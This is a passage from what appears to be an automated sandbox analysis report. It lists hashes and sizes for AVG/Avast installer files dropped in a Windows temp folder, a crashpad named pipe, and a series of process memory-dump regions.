                                                                                      MD5

                                                                                      e448581ceecf4664accf896034ba4a8a

                                                                                      SHA1

                                                                                      cf0bea0ba9e36ffbf77b04a2b247947d8e7ad1d4

                                                                                      SHA256

                                                                                      a258b0665965bfa2c9c58b77aa1e2aa566449362b94ef7238dafc98da7918b88

                                                                                      SHA512

                                                                                      10bfd0d959f47c4012116f5a596ea2661058469ac29718231a91417f90937cbd0dd11d465f8059290b78c421db080d53c776810d93d4e8f965393229f830a1fc

                                                                                    • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\setupui.cont

                                                                                      Filesize

                                                                                      339KB

                                                                                      MD5

                                                                                      cec94dabbcd5294811060976fb71a369

                                                                                      SHA1

                                                                                      88358121f8f1e2ee10e1eb30aa408692b0ef592d

                                                                                      SHA256

                                                                                      930851cef3d3f67d1aee8d4f9429871e4fa3f1f188ec98197bf3283c1762df3c

                                                                                      SHA512

                                                                                      b157eea685392ff5556bb14153be5c8f5f42a2d3354719dab81432209826f0c9f0b756a731065f425c6a2acd2d4495688f41011734902a09aa29042e0fd96bc8

                                                                                    • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\common\icarus_mod.dll

                                                                                      Filesize

                                                                                      14KB

                                                                                      MD5

                                                                                      7ce3328789a3bdf6cdce52e5df446373

                                                                                      SHA1

                                                                                      a9054aa148f110d7ae266b089e0e28c50fae30c2

                                                                                      SHA256

                                                                                      b4b2960fc093aa3964ec1172999c6c24af2d09eae6b0096de46d9884a98a32ef

                                                                                      SHA512

                                                                                      7dbf63e583bc0c0ca39fa33057ec6f99606ef4c6d4a631e9391ff1fc829aee9a346ef418473b8ddd09a249c5a7629226808a4b5d65c24d11326ef3a38f355fdc

                                                                                    • \??\pipe\LOCAL\crashpad_1468_BIFROCIEDIDZWYOD

                                                                                      MD5

                                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                                      SHA1

                                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                      SHA256

                                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                      SHA512

                                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                    • memory/2956-2010-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/2956-1956-0x00000000733E0000-0x00000000735FC000-memory.dmp

                                                                                      Filesize

                                                                                      2.1MB

                                                                                    • memory/2956-2028-0x00000000733E0000-0x00000000735FC000-memory.dmp

                                                                                      Filesize

                                                                                      2.1MB

                                                                                    • memory/2956-2273-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/2956-2383-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/2956-1963-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/2956-1962-0x0000000073690000-0x00000000736B2000-memory.dmp

                                                                                      Filesize

                                                                                      136KB

                                                                                    • memory/2956-2389-0x00000000733E0000-0x00000000735FC000-memory.dmp

                                                                                      Filesize

                                                                                      2.1MB

                                                                                    • memory/2956-2418-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/2956-2022-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/2956-1961-0x0000000073600000-0x0000000073682000-memory.dmp

                                                                                      Filesize

                                                                                      520KB

                                                                                    • memory/2956-1960-0x0000000073690000-0x00000000736B2000-memory.dmp

                                                                                      Filesize

                                                                                      136KB

                                                                                    • memory/2956-1959-0x00000000733E0000-0x00000000735FC000-memory.dmp

                                                                                      Filesize

                                                                                      2.1MB

                                                                                    • memory/2956-2011-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/2956-1957-0x0000000073760000-0x00000000737E2000-memory.dmp

                                                                                      Filesize

                                                                                      520KB

                                                                                    • memory/2956-2063-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/2956-2003-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/2956-1958-0x0000000073600000-0x0000000073682000-memory.dmp

                                                                                      Filesize

                                                                                      520KB

                                                                                    • memory/2956-1980-0x00000000736E0000-0x0000000073757000-memory.dmp

                                                                                      Filesize

                                                                                      476KB

                                                                                    • memory/2956-1983-0x0000000073600000-0x0000000073682000-memory.dmp

                                                                                      Filesize

                                                                                      520KB

                                                                                    • memory/2956-1984-0x00000000733E0000-0x00000000735FC000-memory.dmp

                                                                                      Filesize

                                                                                      2.1MB

                                                                                    • memory/2956-1981-0x00000000736C0000-0x00000000736DC000-memory.dmp

                                                                                      Filesize

                                                                                      112KB

                                                                                    • memory/2956-1955-0x0000000073760000-0x00000000737E2000-memory.dmp

                                                                                      Filesize

                                                                                      520KB

                                                                                    • memory/2956-10001-0x00000000733E0000-0x00000000735FC000-memory.dmp

                                                                                      Filesize

                                                                                      2.1MB

                                                                                    • memory/2956-1979-0x0000000073760000-0x00000000737E2000-memory.dmp

                                                                                      Filesize

                                                                                      520KB

                                                                                    • memory/2956-1978-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/2956-1964-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/2956-10000-0x0000000000420000-0x000000000071E000-memory.dmp

                                                                                      Filesize

                                                                                      3.0MB

                                                                                    • memory/4612-720-0x0000000010000000-0x0000000010010000-memory.dmp

                                                                                      Filesize

                                                                                      64KB